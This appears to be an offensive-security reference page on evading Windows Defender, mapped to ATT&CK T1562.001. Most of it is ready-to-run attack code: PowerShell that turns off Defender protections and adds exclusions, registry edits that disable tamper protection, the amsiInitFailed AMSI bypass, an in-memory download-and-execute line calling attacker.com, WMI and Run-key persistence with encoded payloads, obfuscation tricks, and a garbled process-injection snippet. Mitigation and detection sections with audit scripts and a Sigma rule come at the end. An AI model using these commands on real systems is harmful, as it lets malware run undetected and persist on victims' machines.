High Severity | T1562.001
🛡️ Windows Defender Evasion
🧠 Description
Windows Defender (Microsoft Defender Antivirus) is an integrated anti-malware solution that uses signatures, heuristics, and machine learning to detect threats. Evasion techniques exploit blind spots in real-time protection, signature gaps, and configuration weaknesses to run malicious code undetected.
Detection Methods to Bypass:
- Real-time Protection: Behavior monitoring, script protection
- Cloud-Delivered Protection: Rapid signature updates from cloud
- Heuristic Analysis: Suspicious API patterns, process behavior
- AMSI: Anti-Malware Scan Interface for script inspection
- Behavior Monitoring: Parent-child process relationships
💣 Disabling/Modifying Defender
1. Disable Real-Time Protection:
```powershell
# PowerShell - Disable real-time monitoring
Set-MpPreference -DisableRealtimeMonitoring $true
# Disable behavior monitoring
Set-MpPreference -DisableBehaviorMonitoring $true
# Disable script scanning
Set-MpPreference -DisableScriptScanning $true
# Disable cloud-delivered protection
Set-MpPreference -DisableCloudBlock $true
# Disable sample submission
Set-MpPreference -SubmitSamplesConsent NeverSend
```
2. Tamper Protection Bypass:
```powershell
# Check if tamper protection is enabled
Get-MpComputerStatus | Select-Object IsTamperProtected
# If disabled via Group Policy, can disable via registry
REG ADD "HKLM\Software\Microsoft\Windows Defender\Features" /v TamperProtection /t REG_DWORD /d 0 /f
# Or set the WinDefend service start type to Disabled (requires elevation)
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v Start /t REG_DWORD /d 4 /f
# Wait and restart Defender
sc start WinDefend
```
3. Exclusions (Persistence):
```powershell
# Add folder exclusion
Add-MpPreference -ExclusionPath "C:\Tools"
# Add process exclusion
Add-MpPreference -ExclusionProcess "powershell.exe"
# Add extension exclusion
Add-MpPreference -ExclusionExtension ".txt"
# Verify exclusions
Get-MpPreference | Select-Object ExclusionPath, ExclusionProcess
```
🔓 AMSI Bypass
AMSI Bypass Techniques:
```powershell
# Patch AmsiScanBuffer (PowerShell)
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
# Alternative - patch after load
# Use reflection to access internal types
# Python AMSI bypass
# Hook AmsiScanBuffer to return AMSI_RESULT_CLEAN
```
Evade PowerShell Script Scanning:
```powershell
# Base64 encode your script
$script = @"
Write-Host "Evil payload"
"@
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($script))
powershell -enc $encoded
# Use compression
$compressed = [System.IO.Compression.GZipStream]::new([System.IO.MemoryStream]::new([Convert]::FromBase64String($data)),[System.IO.Compression.CompressionMode]::Decompress)
# XOR obfuscation
$key = 0x42
foreach ($byte in [System.Text.Encoding]::ASCII.GetBytes($script)) {
    [byte]($byte -bxor $key)
}
```
📄 Fileless Evasion
1. Memory-Only Execution:
```powershell
# Download and execute in memory
IEX (New-Object Net.WebClient).DownloadString("http://attacker.com/payload.ps1")
# Using Invoke-Expression
$url = "http://attacker.com/evil.exe"
$bytes = (New-Object Net.WebClient).DownloadData($url)
$process = [System.Reflection.Assembly]::Load($bytes)
$process.EntryPoint.Invoke($null, $null)
# Bypass by not writing to disk
```
2. WMI Event Subscription (Persistence):
```powershell
# Create permanent WMI event
$filter = @"
Namespace: root\subscription
Class: __EventFilter
Name: EvilFilter
EventNamespace: root\cimv2
QueryLanguage: WQL
Query: SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime'
"@
# PowerShell one-liner for execution
$payload = 'powershell -enc JABjAGwAYQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAIgBoAHQAdABwADoALwAvAHMAYQBuAGMAaQBuAGUALgB0AGUALgBhAHQAawBvAC4AYwBvAG0AIgAgAC0ATgBvAHIAaQAgAHsAIABpAGYAKAAkAHsAIABjAGEAdABjAGEAdABjAGEAYwAgAC0ARgBvAHIAYwBhAGwAIAAkAHsAIABiAGEAdABjAHMAIAB9ACkAIAB9AA=='
Register-WmiEvent -Namespace "root\subscription" -Name "EvilTask" -ScriptBlock { Invoke-Expression $payload }
```
3. Registry-Based Execution:
```powershell
# Run key for persistence (no AV bypass, but good for persistence)
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Update" /d "powershell -enc ..."
# Registry autorun locations
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
```
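The two persistence locations in this section (WMI event subscriptions and the Run keys) can be inventoried from the defender's side. The following is an added example, not from the original page; it assumes a local administrator session on Windows PowerShell 5.1 or later and flags the timer-style WQL filter and the encoded or in-memory PowerShell command patterns shown above.

```powershell
# Added example (not from the original page): enumerate WMI subscription persistence and Run keys,
# flagging the trigger and command patterns shown in this section. Needs admin for root\subscription.
function Get-SuspiciousPersistence {
    $out = [System.Collections.Generic.List[object]]::new()
    # Command patterns drawn from the section above: encoded PowerShell, in-memory download/execute.
    $badCmd = 'powershell.*\s-e(nc|ncodedcommand)?\s|Invoke-Expression|\bIEX\b|DownloadString'

    $ns = 'root/subscription'
    foreach ($f in @(Get-CimInstance -Namespace $ns -ClassName __EventFilter -ErrorAction SilentlyContinue)) {
        # Polling a clock class with WITHIN is the classic "run every N seconds" trigger shown above.
        $flag = if ($f.Query -match 'WITHIN.*Win32_LocalTime|Win32_LocalTime.*WITHIN') { 'timer trigger' } else { '' }
        $out.Add([pscustomobject]@{ Source = 'WMI filter'; Name = $f.Name; Detail = $f.Query; Flag = $flag })
    }
    foreach ($c in @(Get-CimInstance -Namespace $ns -ClassName __EventConsumer -ErrorAction SilentlyContinue)) {
        # CommandLineEventConsumer carries CommandLineTemplate, ActiveScriptEventConsumer carries ScriptText.
        $cmd = if ($c.CommandLineTemplate) { $c.CommandLineTemplate } else { $c.ScriptText }
        $flag = if ("$cmd" -match $badCmd) { 'scripted command' } else { '' }
        $out.Add([pscustomobject]@{ Source = 'WMI consumer'; Name = $c.Name; Detail = $cmd; Flag = $flag })
    }
    foreach ($b in @(Get-CimInstance -Namespace $ns -ClassName __FilterToConsumerBinding -ErrorAction SilentlyContinue)) {
        # Reference properties come back as CimInstance objects (with .Name) or as path strings; handle both.
        $fn = if ($b.Filter.Name) { $b.Filter.Name } else { "$($b.Filter)" }
        $cn = if ($b.Consumer.Name) { $b.Consumer.Name } else { "$($b.Consumer)" }
        $out.Add([pscustomobject]@{ Source = 'WMI binding'; Name = ''; Detail = "$fn -> $cn"; Flag = 'active binding' })
    }

    $runKeys = 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run', 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'
    foreach ($key in $runKeys) {
        $props = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
        if (-not $props) { continue }
        foreach ($p in $props.PSObject.Properties) {
            if ($p.Name -like 'PS*') { continue }   # skip PSPath/PSParentPath provider metadata
            $flag = if ("$($p.Value)" -match $badCmd) { 'scripted command' } else { '' }
            $out.Add([pscustomobject]@{ Source = $key; Name = $p.Name; Detail = $p.Value; Flag = $flag })
        }
    }
    return $out
}

# Flagged rows sort to the top; an empty table means no subscriptions or Run entries exist.
Get-SuspiciousPersistence | Sort-Object Flag -Descending | Format-Table -AutoSize -Wrap
```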
🎭 Obfuscation Techniques
1. String Obfuscation:
```powershell
# Split strings
$com = "Comp" + "uter"
$man = "Manage" + "ment"
# Use CHAR array
$cmd = [char]69 + [char]86 + [char]73 + [char]76
# Variable expansion
${env:ProgramFiles(x86)} = "C:\Windows"
${Path} = "path"
Invoke-Expression "$env:SystemRoot\System32\cmd.exe"
```
2. Command Obfuscation:
```
# Space injection
cmd.exe /c whoami
cmd.exe /c" "whoami
cmd.exe /c who;ami
# Caret substitution
cmd.exe /c who^ami
# Quotes
cmd.exe /c "whoami"
# Variable expansion
%:~0,4%%:~8,4% = cmd.exe (using substring expansion)
```
3. Compiled Payloads:
```powershell
# Compile C# inline with PowerShell
Add-Type -TypeDefinition @"
using System;
using System.Runtime.InteropServices;
public class Evil {
    [DllImport("kernel32.dll")]
    public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
    [DllImport("kernel32.dll")]
    public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
}
"@
# Compile VB.NET or C# to .exe
# Use Donut for shellcode conversion
donut -i payload.bin -o output.exe
```
💉 Process Injection
Classic Injection Techniques:
```powershell
# VirtualAllocEx + WriteProcessMemory + CreateRemoteThread
# Target legitimate process (e.g., notepad.exe)
# PowerShell implementation
$process = Get-Process notepad
$address = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(
(GetProcAddress ([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((GetProcAddress ([System.Runtime.InteropServices.Marshal]::LoadLibrary("kernel32.dll")),"VirtualAllocEx").Invoke($null,[IntPtr]::Zero,0x1000,0x3000,0x40)))),
(New-Object System.Runtime.InteropServices.Marshal).Copy($shellcode, 0, [IntPtr]::Add($process.Handle, $address), $shellcode.Length)
# Use CSK or SharpC2 for automated injection
```
Process Hollowing (RunPE):
- Spawn legit process in suspended state
- Unmap its memory
- Write malicious image
- Resume thread
- Tools like donut, sRDI make this easier
🌐 Network Evasion
Beacon Communication:
- HTTPS C2 (certificate validation can be bypassed)
- Use legitimate sites for C2 (Twitter, GitHub)
- Domain fronting (use CDN): connect to legitimate domain, but Host header points to C2
- DNS C2 (long polling, small responses)
- Use DGA (Domain Generation Algorithm)
- Encrypted channels: use TLS 1.3, certificate pinning
Web Traffic Mimicry:
- Look like normal browser traffic
- Use User-Agent of popular browsers
- Mimic request patterns (GET /style.css, etc.)
- Add common headers (Accept, Accept-Language)
🛡️ Mitigation
✅ Defender Hardening:
- Enable Tamper Protection: Prevent Defender modification
- Enable Cloud-Delivered Protection: Rapid threat response
- Enable Attack Surface Reduction: ASR rules block common techniques
- Deploy EDR: Defender + Sentinel/Defender for Endpoint
- Disable PowerShell v2: Remove legacy scripting
- Monitor Script Execution: ASR rules for PowerShell
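An added example, not part of the original page, that checks the hardening items above on the local host with the Defender PowerShell module. It assumes an elevated session on a Windows client SKU where `Get-WindowsOptionalFeature` is available (on Server, check the `PowerShell-V2` feature with `Get-WindowsFeature` instead).

```powershell
# Added example (not from the original page): report which of the hardening controls above are
# missing on this host. Run elevated; the Defender module ships with Windows 10/11 and Server 2016+.
function Get-DefenderHardeningFindings {
    $status   = Get-MpComputerStatus
    $pref     = Get-MpPreference
    $findings = [System.Collections.Generic.List[string]]::new()

    # Tamper Protection: without it, the Set-MpPreference and registry edits shown above succeed from an admin shell.
    if (-not $status.IsTamperProtected)          { $findings.Add('Tamper Protection is OFF') }
    # Real-time, behavior and script monitoring: the layers Set-MpPreference -Disable* turns off.
    if (-not $status.RealTimeProtectionEnabled)  { $findings.Add('Real-time protection is OFF') }
    if (-not $status.BehaviorMonitorEnabled)     { $findings.Add('Behavior monitoring is OFF') }
    if ($pref.DisableScriptScanning)             { $findings.Add('Script scanning is disabled') }
    # Cloud-delivered protection: MAPSReporting 0 = disabled; block-at-first-sight depends on it.
    if ($pref.MAPSReporting -eq 0)               { $findings.Add('Cloud-delivered protection (MAPS) is disabled') }
    if ($pref.DisableBlockAtFirstSeen)           { $findings.Add('Block at first sight is disabled') }
    # Exclusions are the persistence foothold shown above; list every one for review.
    foreach ($p in @($pref.ExclusionPath))       { if ($p) { $findings.Add("Path exclusion: $p") } }
    foreach ($p in @($pref.ExclusionProcess))    { if ($p) { $findings.Add("Process exclusion: $p") } }
    foreach ($e in @($pref.ExclusionExtension))  { if ($e) { $findings.Add("Extension exclusion: $e") } }
    # ASR: action 1 = Block (0 disabled, 2 audit, 6 warn); zero Block rules means none are enforced.
    $blocked = @($pref.AttackSurfaceReductionRules_Actions | Where-Object { $_ -eq 1 }).Count
    if ($blocked -eq 0)                          { $findings.Add('No ASR rules are in Block mode') }
    # Legacy PowerShell v2 engine has no Script Block Logging or AMSI integration.
    $v2 = Get-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2 -ErrorAction SilentlyContinue
    if ($v2 -and $v2.State -eq 'Enabled')        { $findings.Add('PowerShell v2 engine is enabled') }

    return $findings
}

$result = Get-DefenderHardeningFindings
if ($result.Count -eq 0) { 'No weaknesses found in the checked settings.' } else { $result }
```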
🔍 Detection
Sysmon Event Monitoring:
- Monitor PowerShell script block logs: Event ID 4104 (Script Block Logging)
- Monitor AMSI bypass attempts
- Event ID 1102: log cleared
- Monitor Defender modification: check for "MpPreference" modification
- Use an advanced hunting query in MDE:

```
DeviceRegistryEvents
| where RegistryKey contains "MpPreference"
| where ActionType == "RegistryValueModified"
```
Sigma Rules:
```yaml
title: Disable Windows Defender
id: disable-defender
logsource:
  product: windows
  category: process_creation
detection:
  selection:
    EventID: 1
    CommandLine|contains:
      - 'Set-MpPreference'
      - 'DisableRealtimeMonitoring'
      - 'MpPreference'
  condition: selection
level: critical
```
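As an added example, not from the original page, the `contains` logic of the Sigma rule and the log notes above applied in PowerShell to Script Block Logging (Event ID 4104). The indicator strings are the ones this page shows; the sample script blocks are constructed for the demo, and the live query at the end assumes Script Block Logging is enabled and the session is elevated.

```powershell
# Added example (not from the original page): case-insensitive substring hunt, like the Sigma
# `contains` modifier, over script block text. Indicators are the strings used elsewhere on this page.
$Indicators = @{
    'Defender tampering' = @('Set-MpPreference', 'Add-MpPreference', 'DisableRealtimeMonitoring', 'ExclusionPath')
    'Service disable'    = @('WinDefend', 'TamperProtection')
    'AMSI bypass'        = @('amsiInitFailed', 'AmsiScanBuffer', 'AmsiUtils')
    'Fileless execution' = @('DownloadString', 'Assembly]::Load', 'IEX (', 'Invoke-Expression')
    'WMI persistence'    = @('Register-WmiEvent', '__EventFilter', 'root\subscription')
}

function Find-EvasionIndicators {
    param([Parameter(Mandatory)][string]$Text)
    $hits = foreach ($category in $Indicators.Keys) {
        foreach ($needle in $Indicators[$category]) {
            # One hit is enough to attribute the category; stop scanning its needles.
            if ($Text.IndexOf($needle, [StringComparison]::OrdinalIgnoreCase) -ge 0) { $category; break }
        }
    }
    return @($hits | Sort-Object -Unique)
}

# Constructed sample 4104 script blocks: two benign, three lifted from the techniques above.
$samples = @(
    'Get-ChildItem C:\Logs | Measure-Object',
    'Set-MpPreference -DisableRealtimeMonitoring $true',
    "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')",
    'Register-WmiEvent -Namespace "root\subscription" -Name "EvilTask"',
    'Write-Host "Hello"'
)
foreach ($s in $samples) {
    $cats = Find-EvasionIndicators -Text $s
    if ($cats.Count -gt 0) { '[ALERT] {0} :: {1}' -f ($cats -join ', '), $s }
}

# Live hunt over the PowerShell operational log; for 4104, Properties[2] holds ScriptBlockText.
Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } -MaxEvents 5000 -ErrorAction SilentlyContinue |
    ForEach-Object {
        $text = [string]$_.Properties[2].Value
        $cats = Find-EvasionIndicators -Text $text
        if ($cats.Count -gt 0) {
            [pscustomobject]@{
                Time     = $_.TimeCreated
                Category = ($cats -join ', ')
                Snippet  = $text.Substring(0, [Math]::Min(120, $text.Length))
            }
        }
    }
```

The same `Find-EvasionIndicators` function can be pointed at Sysmon Event ID 1 command lines by reading `Properties` from the `Microsoft-Windows-Sysmon/Operational` log instead.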
🛠️ Tools
- Donut: Shellcode to EXE/DLL converter
- Unicorn: PowerShell downgrade and delivery
- Meta Twin: Embed payloads in legit binaries
- SharpC2/Brute Ratel: C2 frameworks with evasion
- Invoke-Obfuscation: PowerShell obfuscation framework